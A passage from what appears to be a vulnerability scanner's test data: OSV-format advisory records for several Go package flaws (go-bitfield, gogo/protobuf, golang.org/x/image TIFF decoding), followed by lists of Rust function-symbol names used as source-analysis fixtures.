"affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, "GHSA-c3h9-896r-86jm": { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GHSA-qgc7-mgm3-q253": { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", 
"aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, "GO-2021-0053": { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] }, "GO-2023-1558": { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": 
"https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] }, "GO-2023-1572": { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727", "GHSA-qgc7-mgm3-q253" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/medium.json ================================================ { "\u0026T::fmt": {}, "alloc::alloc::Global::deallocate": {}, "alloc::alloc::Global::grow": {}, "alloc::alloc::Global::grow_impl": {}, "alloc::alloc::box_free": {}, "alloc::alloc::dealloc": {}, "alloc::alloc::realloc": {}, "alloc::raw_vec::RawVec::current_memory": {}, "alloc::raw_vec::RawVec::drop": {}, "alloc::raw_vec::RawVec::grow_amortized": {}, "alloc::raw_vec::RawVec::ptr": {}, "alloc::raw_vec::RawVec::reserve_for_push": {}, "alloc::raw_vec::RawVec::set_ptr_and_cap": {}, "alloc::raw_vec::finish_grow": {}, "alloc::raw_vec::handle_reserve": {}, "alloc::rc::is_dangling": {}, "alloc::sync::Arc::drop": {}, 
"alloc::sync::Arc::drop_slow": {}, "alloc::sync::Arc::get_mut_unchecked": {}, "alloc::sync::Arc::inner": {}, "alloc::sync::Weak::drop": {}, "alloc::sync::Weak::inner": {}, "alloc::vec::Vec::as_mut_ptr": {}, "alloc::vec::Vec::drop": {}, "alloc::vec::Vec::new": {}, "alloc::vec::Vec::push": {}, "arrayvec::ArrayVec::clear": {}, "arrayvec::ArrayVec::drop": {}, "arrayvec::ArrayVec::len": {}, "arrayvec::ArrayVec::pop": {}, "arrayvec::ArrayVec::set_len": {}, "core::alloc::layout::Layout::array": {}, "core::alloc::layout::Layout::array::inner": {}, "core::alloc::layout::Layout::for_value_raw": {}, "core::cmp::Ord::max": {}, "core::cmp::max": {}, "core::core_arch::x86::sse2::mm_load_si128": {}, "core::core_arch::x86::sse2::mm_movemask_epi8": {}, "core::fmt::Arguments::new_v1": {}, "core::fmt::Arguments::new_v1_formatted": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for i32\u003e::fmt": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for usize\u003e::fmt": {}, "core::mem::drop": {}, "core::mem::maybe_uninit::MaybeUninit::assume_init": {}, "core::mem::size_of_val_raw": {}, "core::num::\u003cimpl isize\u003e::wrapping_neg": {}, "core::num::\u003cimpl isize\u003e::wrapping_sub": {}, "core::num::\u003cimpl usize\u003e::checked_add": {}, "core::num::\u003cimpl usize\u003e::checked_mul": {}, "core::num::\u003cimpl usize\u003e::overflowing_add": {}, "core::num::\u003cimpl usize\u003e::overflowing_mul": {}, "core::panicking::assert_failed": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::add": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::as_ref": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::guaranteed_eq": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::is_null": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::offset": {}, "core::ptr::drop_in_place\u003c\u0026usize\u003e": {}, "core::ptr::drop_in_place\u003c(alloc::string::String,usize)\u003e": {}, "core::ptr::drop_in_place\u003c(regex::dfa::State,u32)\u003e": {}, 
"core::ptr::drop_in_place\u003c[alloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::string::String]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec\u003c(usize,u16)\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec]\u003e": {}, "core::ptr::drop_in_place\u003c[core::option::Option\u003calloc::string::String\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::dfa::State]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::prog::Inst]\u003e": {}, "core::ptr::drop_in_place\u003c[regex_syntax::hir::literal::Literal]\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::ahocorasick::AhoCorasick\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::SearchKind\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::Searcher\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::pattern::Patterns\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::rabinkarp::RabinKarp\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::teddy::runtime::Teddy\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[(char,char)]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[usize]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cdyn core::ops::function::Fn\u003c()\u003e+Output = 
core::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e+core::panic::unwind_safe::UnwindSafe+core::marker::Send+core::marker::Sync+core::panic::unwind_safe::RefUnwindSafe\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003c(usize,u16)\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::backtrack::Job\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003e": {}, "core::ptr::drop_in_place\u003calloc::string::String\u003e": {}, 
"core::ptr::drop_in_place\u003calloc::sync::Arc\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::backtrack::Job\u003e\u003e": {}, 
"core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003e": {}, "core::ptr::drop_in_place\u003carrayvec::ArrayVec\u003c[crossbeam_epoch::deferred::Deferred; 64]\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003caho_corasick::ahocorasick::AhoCorasick\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::result::Result\u003cregex::re_unicode::Regex,regex::error::Error\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::atomic::Owned\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::collector::Collector\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Bag\u003e": {}, 
"core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Global\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::SealedBag\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::list::List\u003ccrossbeam_epoch::internal::Local\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::queue::Queue\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, "core::ptr::drop_in_place\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003calloc::string::String,usize,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003cregex::dfa::State,u32,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(alloc::string::String,usize)\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(regex::dfa::State,u32)\u003e\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::CowBytes\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::Imp\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Finder\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Searcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::backtrack::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::CacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::State\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::StateMap\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Transitions\u003e": {}, "core::ptr::drop_in_place\u003cregex::error::Error\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::Exec\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ExecReadOnly\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ProgramCacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::LiteralSearcher\u003e": {}, 
"core::ptr::drop_in_place\u003cregex::literal::imp::Matcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::Memmem\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::SingleByteSet\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Threads\u003e": {}, "core::ptr::drop_in_place\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Inst\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::InstRanges\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Program\u003e": {}, "core::ptr::drop_in_place\u003cregex::re_unicode::Regex\u003e": {}, "core::ptr::drop_in_place\u003cregex::sparse::SparseSet\u003e": {}, "core::ptr::drop_in_place\u003cregex_syntax::hir::literal::Literal\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003cregex::dfa::State,u32\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::sync::mutex::Mutex\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::drop_in_place": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::offset": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::sub": {}, "core::ptr::non_null::NonNull::as_ref": {}, "core::ptr::read": {}, "core::ptr::write": {}, "core::result::Result::branch": {}, "core::result::Result::fmt": {}, "core::result::Result::from_residual": {}, "core::result::Result::map": {}, "core::result::Result::map_err": {}, "core::result::Result::unwrap": {}, "core::sync::atomic::AtomicUsize::compare_exchange": {}, 
"core::sync::atomic::AtomicUsize::fetch_sub": {}, "core::sync::atomic::AtomicUsize::load": {}, "core::sync::atomic::atomic_compare_exchange": {}, "core::sync::atomic::atomic_load": {}, "core::sync::atomic::atomic_sub": {}, "crossbeam_epoch::atomic::Atomic::compare_and_set": {}, "crossbeam_epoch::atomic::Atomic::load": {}, "crossbeam_epoch::atomic::Owned::drop": {}, "crossbeam_epoch::atomic::Shared::as_raw": {}, "crossbeam_epoch::atomic::Shared::deref": {}, "crossbeam_epoch::atomic::Shared::tag": {}, "crossbeam_epoch::atomic::decompose_data": {}, "crossbeam_epoch::deferred::Deferred::new": {}, "crossbeam_epoch::deferred::Deferred::new::call": {}, "crossbeam_epoch::guard::Guard::defer_destroy": {}, "crossbeam_epoch::guard::Guard::defer_unchecked": {}, "crossbeam_epoch::guard::Guard::defer_unchecked::{{closure}}": {}, "crossbeam_epoch::sync::list::List::drop": {}, "crossbeam_epoch::sync::queue::Queue::drop": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal::{{closure}}": {}, "crossbeam_epoch::sync::queue::Queue::try_pop": {}, "hashbrown::raw::Bucket::drop": {}, "hashbrown::raw::Bucket::next_n": {}, "hashbrown::raw::RawIter::next": {}, "hashbrown::raw::RawIterRange::new": {}, "hashbrown::raw::RawIterRange::next_impl": {}, "hashbrown::raw::RawTable::data_end": {}, "hashbrown::raw::RawTable::drop": {}, "hashbrown::raw::RawTable::drop_elements": {}, "hashbrown::raw::RawTable::free_buckets": {}, "hashbrown::raw::RawTable::is_empty": {}, "hashbrown::raw::RawTable::iter": {}, "hashbrown::raw::RawTable::len": {}, "hashbrown::raw::RawTableInner::buckets": {}, "hashbrown::raw::RawTableInner::free_buckets": {}, "hashbrown::raw::RawTableInner::is_empty_singleton": {}, "hashbrown::raw::TableLayout::calculate_layout_for": {}, "hashbrown::raw::bitmask::BitMask::invert": {}, "hashbrown::raw::bitmask::BitMask::lowest_set_bit": {}, "hashbrown::raw::bitmask::BitMask::remove_lowest_bit": {}, 
"hashbrown::raw::sse2::Group::load_aligned": {}, "hashbrown::raw::sse2::Group::match_empty_or_deleted": {}, "hashbrown::raw::sse2::Group::match_full": {}, "test_rust_2::another_func": {}, "test_rust_2::exported_func": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/simple.json ================================================ { "core::fmt::Arguments::new_v1": {}, "test_rust_2::a_cool_func_name": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/test-rust-2.json ================================================ { "\u0026T::as_ref": {}, "\u0026T::fmt": {}, "\u0026[u8]::spec_new_impl": {}, "\u0026mut I::len": {}, "\u0026mut T::fmt": {}, "\u0026mut W::write_char": {}, "\u0026mut W::write_fmt": {}, "\u0026mut W::write_str": {}, "\u0026std::io::stdio::Stderr::write_fmt": {}, "\u0026std::io::stdio::Stdout::write_fmt": {}, "\u0026str::into_searcher": {}, "\u0026str::is_prefix_of": {}, "\u0026str::is_suffix_of": {}, "\u0026u32::shl": {}, "\u0026u8::bitand": {}, "\u0026u8::shr": {}, "()::fmt": {}, "*const T::fmt": {}, "*mut T::fmt": {}, "\u003cT as alloc::slice::hack::ConvertVec\u003e::to_vec::DropGuard::drop": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::description": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::fmt": {}, "\u003calloc::vec::drain::Drain as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003calloc::vec::into_iter::IntoIter as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003cdyn core::any::Any+core::marker::Send\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::is": {}, 
"F::into_searcher": {}, "I::into_iter": {}, "T::clone": {}, "T::from_elem": {}, "T::into": {}, "T::spec_eq": {}, "T::spec_ne": {}, "T::spec_new_impl": {}, "T::to_vec": {}, "T::type_id": {}, "[A]::equal": {}, "[T]::fmt": {}, "addr2line::Context::find_frames": {}, "addr2line::Context::find_units": {}, "addr2line::Context::find_units_range": {}, "addr2line::Context::find_units_range::{{closure}}": {}, "addr2line::Context::from_dwarf": {}, "addr2line::FrameIter::next": {}, "addr2line::FrameIter::next::{{closure}}": {}, "addr2line::LocationRangeUnitIter::new": {}, "addr2line::LocationRangeUnitIter::new::{{closure}}": {}, "addr2line::RangeAttributes::for_each_range": {}, "addr2line::RangeAttributes::for_each_range::{{closure}}": {}, "addr2line::ResDwarf::find_unit": {}, "addr2line::ResDwarf::parse": {}, "addr2line::ResDwarf::parse::{{closure}}": {}, "addr2line::ResUnit::find_function_or_location": {}, "addr2line::ResUnit::find_function_or_location::{{closure}}": {}, "addr2line::ResUnit::find_location": {}, "addr2line::ResUnit::parse_functions": {}, "addr2line::ResUnit::parse_functions::{{closure}}": {}, "addr2line::ResUnit::parse_lines": {}, "addr2line::ResUnit::parse_lines::{{closure}}": {}, "addr2line::ResUnit::render_file": {}, "addr2line::function::Function::find_inlined_functions": {}, "addr2line::function::Function::find_inlined_functions::{{closure}}": {}, "addr2line::function::Function::parse": {}, "addr2line::function::Function::parse::{{closure}}": {}, "addr2line::function::Function::parse_children": {}, "addr2line::function::Function::skip": {}, "addr2line::function::Functions::find_address": {}, "addr2line::function::Functions::find_address::{{closure}}": {}, "addr2line::function::Functions::parse": {}, "addr2line::function::Functions::parse::{{closure}}": {}, "addr2line::function::InlinedFunction::parse": {}, "addr2line::function::InlinedFunction::parse::{{closure}}": {}, "addr2line::function::name_attr": {}, "addr2line::function::name_entry": 